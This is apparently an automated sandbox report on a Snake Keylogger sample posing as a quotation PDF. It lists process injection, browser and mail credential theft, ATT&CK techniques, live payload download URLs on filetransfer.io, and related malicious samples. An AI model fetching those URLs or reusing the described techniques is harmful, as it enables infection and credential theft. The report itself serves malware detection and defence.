Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe

Thread created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe EIP: 34010000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe

Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe base: 22934010000

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe

Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Queries volume information: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_SEPQTRA071244#U00faPDF.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 5.2.aspnet_compiler.exe.22934340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspnet_compiler.exe.22945d200e8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspnet_compiler.exe.22934340000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspnet_compiler.exe.22945d200e8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3401415580.0000022934340000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3402009366.0000022935F56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3404892860.0000022945D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3402009366.0000022935D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 5792, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 5.2.aspnet_compiler.exe.22934340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspnet_compiler.exe.22945d200e8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspnet_compiler.exe.22934340000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspnet_compiler.exe.22945d200e8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3401415580.0000022934340000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3404892860.0000022945D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 5792, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 5.2.aspnet_compiler.exe.22934340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspnet_compiler.exe.22945d200e8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspnet_compiler.exe.22934340000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspnet_compiler.exe.22945d200e8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3401415580.0000022934340000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3402009366.0000022935F56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3404892860.0000022945D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3402009366.0000022935D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 5792, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 Scheduled Task/Job	211 Process Injection	1 Disable or Modify Tools	1 OS Credential Dumping	1 Query Registry	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	41 Virtualization/Sandbox Evasion	LSASS Memory	111 Security Software Discovery	Remote Desktop Protocol	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	211 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	41 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Software Packing	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	33 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	29%	ReversingLabs	Win64.Trojan.Mardom
QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://checkip.dyndns.org/	0%	URL Reputation	safe
https://stackoverflow.com/q/14436606/23354	0%	URL Reputation	safe
https://stackoverflow.com/q/11564914/23354;	0%	URL Reputation	safe
https://stackoverflow.com/q/2152978/23354	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
https://s24.filetransfer.io/storage/download/klH4VFXHnzlT	0%	Avira URL Cloud	safe
https://github.com/mgravell/protobuf-net	0%	Avira URL Cloud	safe
https://github.com/mgravell/protobuf-neti	0%	Avira URL Cloud	safe
https://github.com/mgravell/protobuf-netJ	0%	Avira URL Cloud	safe
http://filetransfer.io/data-package/Ky4pZ0WB/download	0%	Avira URL Cloud	safe
https://filetransfer.io	0%	Avira URL Cloud	safe
http://checkip.dyndns.com	0%	Avira URL Cloud	safe
http://reallyfreegeoip.org	0%	Avira URL Cloud	safe
https://reallyfreegeoip.org/xml/8.46.123.33p	0%	Avira URL Cloud	safe
https://filetransfer.io/data-package/Ky4pZ0WB/download	0%	Avira URL Cloud	safe
http://filetransfer.io	0%	Avira URL Cloud	safe
https://reallyfreegeoip.org/xml/8.46.123.33	0%	Avira URL Cloud	safe
https://s24.filetransfer.io	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
s24.filetransfer.io	188.114.97.3	true	true	unknown
filetransfer.io	188.114.97.3	true	true	unknown
reallyfreegeoip.org	188.114.96.3	true	true	unknown
checkip.dyndns.com	193.122.130.0	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://s24.filetransfer.io/storage/download/klH4VFXHnzlT	true	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
http://filetransfer.io/data-package/Ky4pZ0WB/download	true	Avira URL Cloud: safe	unknown
https://filetransfer.io/data-package/Ky4pZ0WB/download	true	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org/xml/8.46.123.33p	aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935E1D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-neti	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADF002000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADF2E2000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2665927288.0000028AE6ED0000.00000004.08000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/14436606/23354	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADF002000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2646867703.0000028ACE51D000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADF2E2000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2665927288.0000028AE6ED0000.00000004.08000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/mgravell/protobuf-netJ	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADF002000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADF2E2000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2665927288.0000028AE6ED0000.00000004.08000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://stackoverflow.com/q/11564914/23354;	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADF002000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADF2E2000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2665927288.0000028AE6ED0000.00000004.08000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://stackoverflow.com/q/2152978/23354	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADF002000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADF2E2000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2665927288.0000028AE6ED0000.00000004.08000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/q	aspnet_compiler.exe, 00000005.00000002.3401415580.0000022934340000.00000004.08000000.00040000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3404892860.0000022945D19000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://reallyfreegeoip.org	aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935EBD000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935EE8000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935E3C000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935F30000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935F42000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935EFB000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935ED5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://filetransfer.io	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2646867703.0000028ACE490000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-net	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADF002000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2653955478.0000028ADF2E2000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2665927288.0000028AE6ED0000.00000004.08000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org	aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935E1D000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935EBD000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935EE8000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935F30000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935F42000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935EFB000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935ED5000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935E6B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935ED5000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935E6B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.com	aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935E1D000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935EBD000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935EE8000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935F30000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935F42000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935EFB000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935ED5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://filetransfer.io	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2646867703.0000028ACE451000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2646867703.0000028ACE451000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935D11000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://s24.filetransfer.io	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2646867703.0000028ACE4C3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/	aspnet_compiler.exe, 00000005.00000002.3402009366.0000022935E1D000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3401415580.0000022934340000.00000004.08000000.00040000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.3404892860.0000022945D19000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.97.3	s24.filetransfer.io	European Union	13335	CLOUDFLARENETUS	true
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
193.122.130.0	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1519261
Start date and time:	2024-09-26 09:22:23 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe renamed because original name is a hash value
Original Sample Name:	QUOTATION_SEPQTRA071244PDF.scr.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/0@4/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 57% Number of executed functions: 86 Number of non-executed functions: 6
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe

Simulations

Behavior and APIs

Time	Type	Description
03:23:16	API Interceptor	9690x Sleep call for process: QUOTATION_SEPQTRA071244#U00faPDF.scr.exe modified
03:24:07	API Interceptor	54909x Sleep call for process: aspnet_compiler.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	ADNOC requesting RFQ.exe	Get hash	malicious	FormBook	Browse	www.1win-moldovia.fun/1g7m/
	http://www.tiktok758.com/	Get hash	malicious	Unknown	Browse	www.tiktok758.com/img/logo.4c830710.svg
	TRmSF36qQG.exe	Get hash	malicious	FormBook	Browse	www.zhxgtlw.top/bopi/?0T5=UL08qvZHLtV&EnAHS=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4JOdI1EXss+
	PO5118000306 pdf.exe	Get hash	malicious	FormBook	Browse	www.rtprajalojago.live/2wnz/
	(PO403810)_VOLEX_doc.exe	Get hash	malicious	Lokibot	Browse	dddotx.shop/Mine/PWS/fre.php
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/DiF66Hbf/download
	http://easyantrim.pages.dev/id.html	Get hash	malicious	HTMLPhisher	Browse	easyantrim.pages.dev/id.html
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/13rSMZZi/download
	Purchase Order_ AEPL-2324-1126.exe	Get hash	malicious	FormBook	Browse	www.rtpngk.xyz/yhsl/
	PO-001.exe	Get hash	malicious	FormBook	Browse	www.x0x9x8x8x7x6.shop/assb/
188.114.96.3	ADNOC requesting RFQ.exe	Get hash	malicious	FormBook	Browse	www.chinaen.org/zi4g/
	http://twint.ch-daten.com/de/receive/bank/sgkb/79469380	Get hash	malicious	Unknown	Browse	twint.ch-daten.com/socket.io/?EIO=4&transport=polling&t=P8hxwsc
	Cbequipment-Voice Audio Interface.pdf	Get hash	malicious	HTMLPhisher	Browse	www.444317.com/
	Sept order.doc	Get hash	malicious	FormBook	Browse	www.rajalele.xyz/bopi/?1b=1soTE/gd/ZpFZmuHMdkP9CmM1erq3xsEeOQ9nFH+Tv+qMlBfxeqrLL5BDR/2l62DivVTHQ==&BfL=LxlT-
	1e#U0414.exe	Get hash	malicious	Lokibot	Browse	dddotx.shop/Mine/PWS/fre.php
	https://laurachenel-my.sharepoint.com/:f:/p/durae/EqNLWpSMEBRJoccjxMrYR9cBuepxDM4GGslgNeOpyvFENQ?e=1C1jRH	Get hash	malicious	Unknown	Browse	hdcy.emcl00.com/qRCfs/
	PO23100072.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/ttiz/
	RFQ urrgently.exe	Get hash	malicious	FormBook	Browse	www.1win-moldovia.fun/1g7m/
	TNT AWB TRACKING DETAILS.exe	Get hash	malicious	FormBook	Browse	www.weight-loss-003.today/jd21/?Bl=8pSpW470ix&FjUh5xw=8QhlJgbwFiNHSz6ilu/NO/QAEgywgMMp9yv6yRtWAY1NzG57DnL+pjMXQcNu92teMaGp
	Petronas quotation request.exe	Get hash	malicious	FormBook	Browse	www.chinaen.org/zi4g/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s24.filetransfer.io	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	QUOTATION_SEPQTRA071244#U00faPDF.scr	Get hash	malicious	FormBook	Browse	188.114.96.3
	QUOTATION_SEPQTRA071244#U00faPDF.scr	Get hash	malicious	Unknown	Browse	188.114.96.3
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	QUOTATION_AUGQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	QUOTATION_JULQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
reallyfreegeoip.org	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	z95g0YV3PKzM3LA5zt.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse	188.114.97.3
	inquiry.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	E-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
checkip.dyndns.com	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	Payment Slip.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	z95g0YV3PKzM3LA5zt.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	SecuriteInfo.com.Win32.PWSX-gen.19525.31847.exe	Get hash	malicious	VIP Keylogger	Browse	193.122.130.0
	inquiry.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	E-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
filetransfer.io	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Thyssenkrupp PO040232.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	450230549.exe	Get hash	malicious	AgentTesla	Browse	162.159.134.233
	64.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	450230549.exe	Get hash	malicious	Unknown	Browse	162.159.134.233
	PO-100001499.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
